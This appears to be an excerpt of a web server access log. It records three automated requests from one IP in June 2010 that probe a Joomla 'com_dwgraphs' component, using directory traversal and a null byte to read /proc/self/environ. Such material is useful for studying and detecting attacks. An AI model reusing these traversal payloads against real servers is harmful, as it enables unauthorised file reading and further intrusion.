94.23.11.114 - - [01/Jun/2010:22:28:34 -0500] "GET /?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.11.114 - - [01/Jun/2010:22:28:34 -0500] "GET /logs/?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.803"
94.23.11.114 - - [01/Jun/2010:22:28:35 -0500] "GET /?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
